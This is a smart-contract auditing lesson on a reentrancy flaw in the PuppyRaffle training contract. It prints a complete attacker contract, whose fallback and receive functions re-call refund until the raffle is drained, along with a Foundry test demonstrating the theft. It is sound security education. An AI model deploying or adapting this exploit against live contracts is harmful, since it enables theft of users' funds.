_Follow along with this video:_ --- ### Reentrancy in PuppyRaffle Returning to PuppyRaffle, let's look at how all we've learnt affects this protocol. A look again at this `refund` function and we see a classic case of reentrancy with an external call being made before updating state. ```js function refund(uint256 playerIndex) public { address playerAddress = players[playerIndex]; require(playerAddress == msg.sender, "PuppyRaffle: Only the player can refund"); require(playerAddress != address(0), "PuppyRaffle: Player already refunded, or is not active"); // @Audit: Reentrancy payable(msg.sender).sendValue(entranceFee); players[playerIndex] = address(0); emit RaffleRefunded(playerAddress); } ``` ### The PoC We can start by writing a new test in the protocol's `PuppyRaffle.t.sol` file. We'll have a bunch of players enter the raffle. ```js function test_reentrancyRefund() public { address[] memory players = new address[](4); players[0] = playerOne; players[1] = playerTwo; players[2] = playerThree; players[3] = playerFour; puppyRaffle.enterRaffle{value: entranceFee * 4}(players); } ``` > **Note:** There _is_ a `playersEntered` modifier we could use, included in this test suite, but we'll choose to be explicit here. Next we'll create our `ReentrancyAttacker` Contract. ```js contract ReentrancyAttacker { PuppyRaffle puppyRaffle; uint256 entranceFee; uint256 attackerIndex; constructor(PuppyRaffle _puppyRaffle) { puppyRaffle = _puppyRaffle; entranceFee = puppyRaffle.entranceFee(); } function attack() public payable { address[] memory players = new address[](1); players[0] = address(this); puppyRaffle.enterRaffle{value: entranceFee}(players); attackerIndex = puppyRaffle.getActivePlayerIndex(address(this)); puppyRaffle.refund(attackerIndex); } } ``` Once deployed, this `attack` function is going to kick off the attack. In order, we're entering the raffle, acquiring our `playerIndex`, and then refunding our `entranceFee`. This is going to cause our entranceFee to be sent back to our contract ... what happens then? ```js function _stealMoney() internal { if (address(puppyRaffle).balance >= entranceFee) { puppyRaffle.refund(attackerIndex); } } fallback() external payable { _stealMoney(); } receive() external payable { _stealMoney(); } ``` Adding these functions to our `ReentrancyAttacker` contract finishes the job. When funds are sent back to our contract, the `fallback` or `receive` functions are called which is going to trigger another `refund` call in our `_stealMoney` function, completing the loop until the `PuppyRaffle` contract is drained! <details> <summary> ReentrancyAttacker Contract </summary> ```js contract ReentrancyAttacker { PuppyRaffle puppyRaffle; uint256 entranceFee; uint256 attackerIndex; constructor(PuppyRaffle _puppyRaffle) { puppyRaffle = _puppyRaffle; entranceFee = puppyRaffle.entranceFee(); } function attack() public payable { address[] memory players = new address[](1); players[0] = address(this); puppyRaffle.enterRaffle{value: entranceFee}(players); attackerIndex = puppyRaffle.getActivePlayerIndex(address(this)); puppyRaffle.refund(attackerIndex); } function _stealMoney() internal { if (address(puppyRaffle).balance >= entranceFee) { puppyRaffle.refund(attackerIndex); } } fallback() external payable { _stealMoney(); } receive() external payable { _stealMoney(); } } ``` </details> :br Alright, let's add this logic to our test. First we'll create an instance of the attacker contract and an attacker address, funding it with 1 ether. ```js ReentrancyAttacker attackerContract = new ReentrancyAttacker(puppyRaffle); address attacker = makeAddr("attacker"); vm.deal(attacker, 1 ether); ``` Next, we'll grab some balances so we're able to log our changes after the attack. ```js uint256 startingAttackContractBalance = address(attackerContract).balance; uint256 startingPuppyRaffleBalance = address(puppyRaffle).balance; ``` We finally call the attack, like so: ```js vm.prank(attacker); attackerContract.attack{value: entranceFee}(); ``` Then we'll console.log the impact: ```js console.log("attackerContract balance: ", startingAttackContractBalance); console.log("puppyRaffle balance: ", startingPuppyRaffleBalance); console.log( "ending attackerContract balance: ", address(attackerContract).balance ); console.log("ending puppyRaffle balance: ", address(puppyRaffle).balance); ``` <details> <summary>test_reentrancyRefund</summary> ```js function test_reentrancyRefund() public { // users entering raffle address[] memory players = new address[](4); players[0] = playerOne; players[1] = playerTwo; players[2] = playerThree; players[3] = playerFour; puppyRaffle.enterRaffle{value: entranceFee * 4}(players); // create attack contract and user ReentrancyAttacker attackerContract = new ReentrancyAttacker(puppyRaffle); address attacker = makeAddr("attacker"); vm.deal(attacker, 1 ether); // noting starting balances uint256 startingAttackContractBalance = address(attackerContract).balance; uint256 startingPuppyRaffleBalance = address(puppyRaffle).balance; // attack vm.prank(attacker); attackerContract.attack{value: entranceFee}(); // impact console.log("attackerContract balance: ", startingAttackContractBalance); console.log("puppyRaffle balance: ", startingPuppyRaffleBalance); console.log("ending attackerContract balance: ", address(attackerContract).balance); console.log("ending puppyRaffle balance: ", address(puppyRaffle).balance); } ``` </details> :br All we need to do now is run this test with the command `forge test --mt test_reentrancyRefund -vvv` and we should receive... ::image{src='/security-section-4/23-reentrancy-poc/reentrancy-poc1.png' style='width: 75%; height: auto;'} ### Wrap Up We did it! We've proven the vulnerability through our application of our PoC and we'll absolutely be submitting this as a finding - likely a `High`. Be very proud of what you've learnt so far, you're now armed to safeguard De-Fi against some of the most prevalent vulnerabilities in Web3. Let's go back to the code back and continue our recon in the next lesson.
Identify & exploit smart contract re-entrancy vulnerability for PuppyRaffle. Demo of POC with a hypothetical attacker contract. Discuss prevention methods.
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